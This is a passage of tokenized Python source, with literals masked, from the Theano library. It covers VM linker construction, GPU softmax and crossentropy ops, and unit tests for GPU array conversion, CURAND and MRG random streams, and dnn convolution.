lazy is None : <EOL> lazy = config . vm . lazy <EOL> if lazy is None : <EOL> lazy = not all ( [ ( not th . lazy ) for th in thunks ] ) <EOL> if not lazy : <EOL> if self . allow_gc : <EOL> vm = LoopGC ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> post_thunk_clear , <EOL> ) <EOL> else : <EOL> vm = Loop ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> ) <EOL> else : <EOL> deps = self . compute_gc_dependencies ( storage_map ) <EOL> vm = Stack ( <EOL> nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , <EOL> self . fgraph , self . allow_gc , <EOL> dependencies = deps <EOL> ) <EOL> return vm <EOL> def make_all ( self , profiler = None , input_storage = None , <EOL> output_storage = None , storage_map = None , <EOL> ) : <EOL> fgraph = self . fgraph <EOL> order = self . schedule ( fgraph ) <EOL> no_recycling = self . no_recycling <EOL> input_storage , output_storage , storage_map = link . map_storage ( <EOL> fgraph , order , input_storage , output_storage , storage_map ) <EOL> compute_map = { } <EOL> for k in storage_map : <EOL> compute_map [ k ] = [ k . owner is None ] <EOL> thunks = [ ] <EOL> compute_map_re = defaultdict ( lambda : [ <NUM_LIT:0> ] ) <EOL> for var in fgraph . inputs : <EOL> compute_map_re [ var ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> if getattr ( fgraph . profile , '<STR_LIT>' , None ) : <EOL> dependencies = getattr ( fgraph . profile , '<STR_LIT>' ) <EOL> else : <EOL> dependencies = self . compute_gc_dependencies ( storage_map ) <EOL> reallocated_info = calculate_reallocate_info ( <EOL> order , fgraph , storage_map , compute_map_re , dependencies ) <EOL> for node in order : <EOL> try : <EOL> if self . c_thunks is False : <EOL> node . op . _op_use_c_code = False <EOL> thunks . append ( node . op . make_thunk ( node , <EOL> storage_map , <EOL> compute_map , <EOL> no_recycling ) ) <EOL> if not hasattr ( thunks [ - <NUM_LIT:1> ] , '<STR_LIT>' ) : <EOL> thunks [ - <NUM_LIT:1> ] . lazy = False <EOL> except Exception as e : <EOL> e . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" , node , "<STR_LIT:\n>" ) + e . args <EOL> raise <EOL> for node , thunk in zip ( order , thunks ) : <EOL> thunk . inputs = [ storage_map [ v ] for v in node . inputs ] <EOL> thunk . outputs = [ storage_map [ v ] for v in node . outputs ] <EOL> lazy = self . lazy <EOL> if lazy is None : <EOL> lazy = config . vm . lazy <EOL> if lazy is None : <EOL> lazy = not all ( [ ( not th . lazy ) for th in thunks ] ) <EOL> if not ( lazy or ( config . profile and config . profile_memory ) or <EOL> self . use_cloop or self . callback ) : <EOL> for pair in itervalues ( reallocated_info ) : <EOL> storage_map [ pair [ <NUM_LIT:1> ] ] = storage_map [ pair [ <NUM_LIT:0> ] ] <EOL> computed , last_user = link . gc_helper ( order ) <EOL> if self . allow_gc : <EOL> post_thunk_clear = [ ] <EOL> for node in order : <EOL> clear_after_this_thunk = [ ] <EOL> for input in node . inputs : <EOL> if ( input in computed and <EOL> input not in fgraph . outputs and <EOL> node == last_user [ input ] and <EOL> input not in reallocated_info ) : <EOL> clear_after_this_thunk . append ( storage_map [ input ] ) <EOL> post_thunk_clear . append ( clear_after_this_thunk ) <EOL> else : <EOL> post_thunk_clear = None <EOL> vm = self . make_vm ( order , thunks , <EOL> input_storage , output_storage , storage_map , <EOL> post_thunk_clear , <EOL> computed , <EOL> compute_map , <EOL> self . updated_vars , <EOL> ) <EOL> vm . storage_map = storage_map <EOL> return ( vm , <EOL> [ link . Container ( input , storage ) <EOL> for input , storage in zip ( fgraph . inputs , input_storage ) ] , <EOL> [ link . Container ( output , storage , True ) <EOL> for output , storage in zip ( fgraph . outputs , output_storage ) ] , <EOL> thunks , <EOL> order ) <EOL> def __setstate__ ( self , d ) : <EOL> self . __dict__ . update ( d ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . c_thunks = True </s>
<s> import numpy <EOL> import theano <EOL> from theano . misc . gnumpy_utils import gnumpy_available <EOL> if not gnumpy_available : <EOL> from nose . plugins . skip import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> from theano . misc . gnumpy_utils import ( garray_to_cudandarray , <EOL> cudandarray_to_garray ) <EOL> import gnumpy <EOL> def test ( shape = ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) : <EOL> """<STR_LIT>""" <EOL> gpu = theano . sandbox . cuda . basic_ops . gpu_from_host <EOL> U = gpu ( theano . tensor . ftensor3 ( '<STR_LIT>' ) ) <EOL> ii = theano . function ( [ U ] , gpu ( U + <NUM_LIT:1> ) ) <EOL> A = gnumpy . rand ( * shape ) <EOL> A_cnd = garray_to_cudandarray ( A ) <EOL> assert A_cnd . shape == A . shape <EOL> B_cnd = ii ( A_cnd ) <EOL> B = cudandarray_to_garray ( B_cnd ) <EOL> assert A_cnd . shape == A . shape <EOL> from numpy import array <EOL> u = ( A + <NUM_LIT:1> ) . asarray ( ) <EOL> v = B . asarray ( ) <EOL> w = array ( B_cnd ) <EOL> assert ( u == v ) . all ( ) <EOL> assert ( u == w ) . all ( ) <EOL> def test2 ( shape = ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) : <EOL> """<STR_LIT>""" <EOL> gpu = theano . sandbox . cuda . basic_ops . gpu_from_host <EOL> U = gpu ( theano . tensor . ftensor3 ( '<STR_LIT>' ) ) <EOL> ii = theano . function ( [ U ] , gpu ( U + <NUM_LIT:1> ) ) <EOL> A = numpy . random . rand ( * shape ) . astype ( '<STR_LIT>' ) <EOL> A_cnd = theano . sandbox . cuda . CudaNdarray ( A ) <EOL> A_gar = cudandarray_to_garray ( A_cnd ) <EOL> assert A_cnd . shape == A_gar . shape <EOL> B = garray_to_cudandarray ( A_gar ) <EOL> assert A_cnd . shape == B . shape <EOL> assert A_cnd . _strides == B . _strides <EOL> assert A_cnd . gpudata == B . gpudata <EOL> v = numpy . asarray ( B ) <EOL> assert ( v == A ) . all ( ) <EOL> def test_broadcast_dims ( ) : <EOL> """<STR_LIT>""" <EOL> test ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> test ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> test ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> test2 ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> test2 ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> test2 ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) </s>
<s> from __future__ import print_function <EOL> from theano import Op , Apply <EOL> from six import StringIO <EOL> from theano . sandbox . cuda import GpuOp <EOL> from theano . sandbox . cuda . basic_ops import as_cuda_ndarray_variable <EOL> from theano . sandbox . cuda . kernel_codegen import ( nvcc_kernel , <EOL> inline_softmax , <EOL> inline_softmax_fixed_shared ) <EOL> class GpuCrossentropySoftmaxArgmax1HotWithBias ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:3> <EOL> nout = <NUM_LIT:3> <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x , b , y_idx ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> b = as_cuda_ndarray_variable ( b ) <EOL> y_idx = as_cuda_ndarray_variable ( y_idx ) <EOL> nll = y_idx . type ( ) <EOL> sm = x . type ( ) <EOL> am = y_idx . type ( ) <EOL> return Apply ( self , [ x , b , y_idx ] , [ nll , sm , am ] ) <EOL> def c_headers ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def c_support_code ( self ) : <EOL> return """<STR_LIT>""" <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , b , y_idx = inp <EOL> nll , sm , am = out <EOL> classname = self . __class__ . __name__ <EOL> fail = sub [ '<STR_LIT>' ] <EOL> sio = StringIO ( ) <EOL> print ( """<STR_LIT>""" % locals ( ) , file = sio ) <EOL> return sio . getvalue ( ) <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:5> , ) <EOL> gpu_crossentropy_softmax_argmax_1hot_with_bias = GpuCrossentropySoftmaxArgmax1HotWithBias ( ) <EOL> class GpuCrossentropySoftmax1HotWithBiasDx ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:3> <EOL> nout = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> Op . __init__ ( self , ** kwargs ) <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , dy , sm , y_idx ) : <EOL> dy = as_cuda_ndarray_variable ( dy ) <EOL> sm = as_cuda_ndarray_variable ( sm ) <EOL> y_idx = as_cuda_ndarray_variable ( y_idx ) <EOL> return Apply ( self , [ dy , sm , y_idx ] , [ sm . type ( ) ] ) <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:8> , ) <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> dnll , sm , y_idx = inp <EOL> dx , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> return """<STR_LIT>""" % locals ( ) <EOL> gpu_crossentropy_softmax_1hot_with_bias_dx = GpuCrossentropySoftmax1HotWithBiasDx ( ) <EOL> class GpuSoftmax ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> return Apply ( self , [ x ] , [ x . type ( ) ] ) <EOL> def infer_shape ( self , node , shape ) : <EOL> return shape <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:9> , ) + inline_softmax . code_version <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , = inp <EOL> z , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> ret1 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> ret2 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax_fixed_shared ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> return ret1 + "<STR_LIT:\n>" + ret2 <EOL> gpu_softmax = GpuSoftmax ( ) <EOL> class GpuSoftmaxWithBias ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:2> <EOL> nout = <NUM_LIT:1> <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x , b ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> return Apply ( self , [ x , b ] , [ x . type ( ) ] ) <EOL> def infer_shape ( self , node , shape ) : <EOL> return [ shape [ <NUM_LIT:0> ] ] <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:9> , ) + inline_softmax . code_version <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , b = inp <EOL> z , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> ret1 = nvcc_kernel ( <EOL> "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> ret2 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax_fixed_shared ( '<STR_LIT:N>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> return ret1 + "<STR_LIT:\n>" + ret2 <EOL> gpu_softmax_with_bias = GpuSoftmaxWithBias ( ) </s>
<s> from __future__ import print_function <EOL> import numpy <EOL> import theano <EOL> from theano . tensor import constant <EOL> from theano . sandbox . cuda . rng_curand import CURAND_RandomStreams <EOL> from theano . sandbox . rng_mrg import MRG_RandomStreams <EOL> from nose . plugins . skip import SkipTest <EOL> import theano . sandbox . cuda as cuda_ndarray <EOL> if cuda_ndarray . cuda_available == False : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if theano . config . mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> mode_with_gpu = theano . compile . mode . get_mode ( '<STR_LIT>' ) . including ( '<STR_LIT>' ) <EOL> else : <EOL> mode_with_gpu = theano . compile . mode . get_default_mode ( ) . including ( '<STR_LIT>' ) <EOL> def check_uniform_basic ( shape_as_symbolic , dim_as_symbolic = False ) : <EOL> """<STR_LIT>""" <EOL> rng = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> if shape_as_symbolic : <EOL> shape = constant ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> else : <EOL> if dim_as_symbolic : <EOL> shape = ( <NUM_LIT:10> , constant ( <NUM_LIT:10> ) ) <EOL> else : <EOL> shape = ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> u0 = rng . uniform ( shape ) <EOL> u1 = rng . uniform ( shape ) <EOL> f0 = theano . function ( [ ] , u0 , mode = mode_with_gpu ) <EOL> f1 = theano . function ( [ ] , u1 , mode = mode_with_gpu ) <EOL> v0list = [ f0 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> v1list = [ f1 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v0list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v1list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:0> ] ) <EOL> for v in v0list : <EOL> assert v . shape == ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> assert v . min ( ) >= <NUM_LIT:0> <EOL> assert v . max ( ) <= <NUM_LIT:1> <EOL> assert v . min ( ) < v . max ( ) <EOL> assert <NUM_LIT> <= v . mean ( ) <= <NUM_LIT> <EOL> def test_uniform_basic ( ) : <EOL> """<STR_LIT>""" <EOL> yield check_uniform_basic , False <EOL> yield check_uniform_basic , False , True <EOL> yield check_uniform_basic , True <EOL> def check_normal_basic ( shape_as_symbolic , dim_as_symbolic = False ) : <EOL> """<STR_LIT>""" <EOL> rng = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> if shape_as_symbolic : <EOL> shape = constant ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> else : <EOL> if dim_as_symbolic : <EOL> shape = ( <NUM_LIT:10> , constant ( <NUM_LIT:10> ) ) <EOL> else : <EOL> shape = ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> u0 = rng . normal ( shape ) <EOL> u1 = rng . normal ( shape ) <EOL> f0 = theano . function ( [ ] , u0 , mode = mode_with_gpu ) <EOL> f1 = theano . function ( [ ] , u1 , mode = mode_with_gpu ) <EOL> v0list = [ f0 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> v1list = [ f1 ( ) for i in range ( <NUM_LIT:3> ) ] <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v0list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v1list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:1> ] ) <EOL> assert numpy . all ( v0list [ <NUM_LIT:0> ] != v1list [ <NUM_LIT:0> ] ) <EOL> for v in v0list : <EOL> assert v . shape == ( <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> assert v . min ( ) < v . max ( ) <EOL> assert - <NUM_LIT> <= v . mean ( ) <= <NUM_LIT> <EOL> def test_normal_basic ( ) : <EOL> """<STR_LIT>""" <EOL> yield check_normal_basic , False <EOL> yield check_normal_basic , False , True <EOL> yield check_normal_basic , True <EOL> def compare_speed ( ) : <EOL> mrg = MRG_RandomStreams ( ) <EOL> crn = CURAND_RandomStreams ( <NUM_LIT> ) <EOL> N = <NUM_LIT:1000> * <NUM_LIT:100> <EOL> dest = theano . shared ( numpy . zeros ( N , dtype = theano . config . floatX ) ) <EOL> mrg_u = theano . function ( [ ] , [ ] , updates = { dest : mrg . uniform ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> crn_u = theano . function ( [ ] , [ ] , updates = { dest : crn . uniform ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> mrg_n = theano . function ( [ ] , [ ] , updates = { dest : mrg . normal ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> crn_n = theano . function ( [ ] , [ ] , updates = { dest : crn . normal ( ( N , ) ) } , <EOL> profile = '<STR_LIT>' ) <EOL> for f in mrg_u , crn_u , mrg_n , crn_n : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> theano . printing . debugprint ( f ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> for f in mrg_u , crn_u , mrg_n , crn_n : <EOL> f . fn . time_thunks = ( i > <NUM_LIT:0> ) <EOL> f ( ) </s>
<s> from nose . plugins . skip import SkipTest <EOL> from theano . tensor . nnet . tests import test_abstract_conv <EOL> from . . type import GpuArrayType , gpuarray_shared_constructor <EOL> from . . dnn import dnn_available , GpuDnnConv , GpuDnnConvGradW , GpuDnnConvGradI <EOL> from . config import mode_with_gpu , test_ctx_name <EOL> gpu_ftensor4 = GpuArrayType ( dtype = '<STR_LIT>' , broadcastable = ( False , ) * <NUM_LIT:4> ) <EOL> class TestDnnConv2d ( test_abstract_conv . BaseTestConv2d ) : <EOL> def setUp ( self ) : <EOL> super ( TestDnnConv2d , self ) . setUp ( ) <EOL> self . shared = gpuarray_shared_constructor <EOL> self . provide_shape = [ False ] <EOL> def tcase ( self , i , f , s , b , flip , provide_shape ) : <EOL> if not dnn_available ( test_ctx_name ) : <EOL> raise SkipTest ( dnn_available . msg ) <EOL> mode = mode_with_gpu <EOL> o = self . get_output_shape ( i , f , s , b ) <EOL> self . run_fwd ( inputs_shape = i , filters_shape = f , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConv ) <EOL> self . run_gradweight ( inputs_shape = i , filters_shape = f , <EOL> output_shape = o , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConvGradW ) <EOL> self . run_gradinput ( inputs_shape = i , filters_shape = f , <EOL> output_shape = o , subsample = s , <EOL> verify_grad = True , mode = mode , <EOL> provide_shape = provide_shape , border_mode = b , <EOL> filter_flip = flip , target_op = GpuDnnConvGradI ) <EOL> class TestDnnConvTypes ( test_abstract_conv . TestConvTypes ) : <EOL> def setUp ( self ) : <EOL> self . input = gpu_ftensor4 ( ) <EOL> self . filters = gpu_ftensor4 ( ) <EOL> self . topgrad = gpu_ftensor4 ( ) </s>
<s> from __future__ import print_function <EOL> import copy <EOL> import os <EOL> import sys <EOL> import time <EOL> import unittest <EOL> from nose . plugins . skip import SkipTest <EOL> from nose . tools import assert_raises <EOL> import numpy <EOL> from six . moves import xrange <EOL> import theano <EOL> from theano import tensor , config <EOL> from theano . sandbox import rng_mrg <EOL> from theano . sandbox . rng_mrg import MRG_RandomStreams <EOL> from theano . sandbox . cuda import cuda_available <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tests . unittest_tools import attr <EOL> if cuda_available : <EOL> from theano . sandbox . cuda import float32_shared_constructor <EOL> mode = config . mode <EOL> mode_with_gpu = theano . compile . mode . get_default_mode ( ) . including ( '<STR_LIT>' ) <EOL> utt . seed_rng ( ) <EOL> java_samples = numpy . loadtxt ( os . path . join ( os . path . split ( theano . __file__ ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def test_deterministic ( ) : <EOL> seed = utt . fetch_seed ( ) <EOL> sample_size = ( <NUM_LIT:10> , <NUM_LIT:20> ) <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> for use_cuda in test_use_cuda : <EOL> R = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> u = R . uniform ( size = sample_size ) <EOL> f = theano . function ( [ ] , u ) <EOL> fsample1 = f ( ) <EOL> fsample2 = f ( ) <EOL> assert not numpy . allclose ( fsample1 , fsample2 ) <EOL> R2 = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> u2 = R2 . uniform ( size = sample_size ) <EOL> g = theano . function ( [ ] , u2 ) <EOL> gsample1 = g ( ) <EOL> gsample2 = g ( ) <EOL> assert numpy . allclose ( fsample1 , gsample1 ) <EOL> assert numpy . allclose ( fsample2 , gsample2 ) <EOL> def test_consistency_randomstreams ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> for use_cuda in test_use_cuda : <EOL> samples = [ ] <EOL> rng = MRG_RandomStreams ( seed = seed , use_cuda = use_cuda ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> u = rng . uniform ( size = ( n_substreams , ) , nstreams = n_substreams ) <EOL> f = theano . function ( [ ] , u ) <EOL> for j in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> stream_samples = numpy . array ( stream_samples ) <EOL> stream_samples = stream_samples . T . flatten ( ) <EOL> samples . append ( stream_samples ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_cpu_serial ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> rstate = theano . shared ( numpy . array ( [ stream_rstate . copy ( ) ] , <EOL> dtype = '<STR_LIT>' ) ) <EOL> new_rstate , sample = rng_mrg . mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = config . floatX , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> rstate . default_update = new_rstate <EOL> f = theano . function ( [ ] , sample ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_cpu_parallel ( ) : <EOL> """<STR_LIT>""" <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_samples = [ ] <EOL> rstate = [ curr_rstate . copy ( ) ] <EOL> for j in range ( <NUM_LIT:1> , n_substreams ) : <EOL> rstate . append ( rng_mrg . ff_2p72 ( rstate [ - <NUM_LIT:1> ] ) ) <EOL> rstate = numpy . asarray ( rstate ) <EOL> rstate = theano . shared ( rstate ) <EOL> new_rstate , sample = rng_mrg . mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = config . floatX , <EOL> size = ( n_substreams , ) ) <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> rstate . default_update = new_rstate <EOL> f = theano . function ( [ ] , sample ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> stream_samples . append ( s ) <EOL> samples . append ( numpy . array ( stream_samples ) . T . flatten ( ) ) <EOL> curr_rstate = rng_mrg . ff_2p134 ( curr_rstate ) <EOL> samples = numpy . array ( samples ) . flatten ( ) <EOL> assert ( numpy . allclose ( samples , java_samples ) ) <EOL> def test_consistency_GPU_serial ( ) : <EOL> """<STR_LIT>""" <EOL> if not cuda_available : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> if config . mode == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> seed = <NUM_LIT> <EOL> n_samples = <NUM_LIT:5> <EOL> n_streams = <NUM_LIT:12> <EOL> n_substreams = <NUM_LIT:7> <EOL> samples = [ ] <EOL> curr_rstate = numpy . array ( [ seed ] * <NUM_LIT:6> , dtype = '<STR_LIT>' ) <EOL> for i in range ( n_streams ) : <EOL> stream_rstate = curr_rstate . copy ( ) <EOL> for j in range ( n_substreams ) : <EOL> substream_rstate = numpy . array ( stream_rstate . copy ( ) , dtype = '<STR_LIT>' ) <EOL> tmp_float_buf = numpy . frombuffer ( substream_rstate . data , <EOL> dtype = '<STR_LIT>' ) <EOL> rstate = float32_shared_constructor ( tmp_float_buf ) <EOL> new_rstate , sample = rng_mrg . GPU_mrg_uniform . new ( rstate , ndim = None , <EOL> dtype = '<STR_LIT>' , <EOL> size = ( <NUM_LIT:1> , ) ) <EOL> rstate . default_update = new_rstate <EOL> sample . rstate = rstate <EOL> sample . update = ( rstate , new_rstate ) <EOL> cpu_sample = tensor . as_tensor_variable ( sample ) <EOL> f = theano . function ( [ ] , cpu_sample , mode = mode ) <EOL> for k in range ( n_samples ) : <EOL> s = f ( ) <EOL> samples . append ( s ) <EOL> stream_rstate = rng_mrg . ff_2p72 ( stream_rstate ) <EOL> curr_rstate = 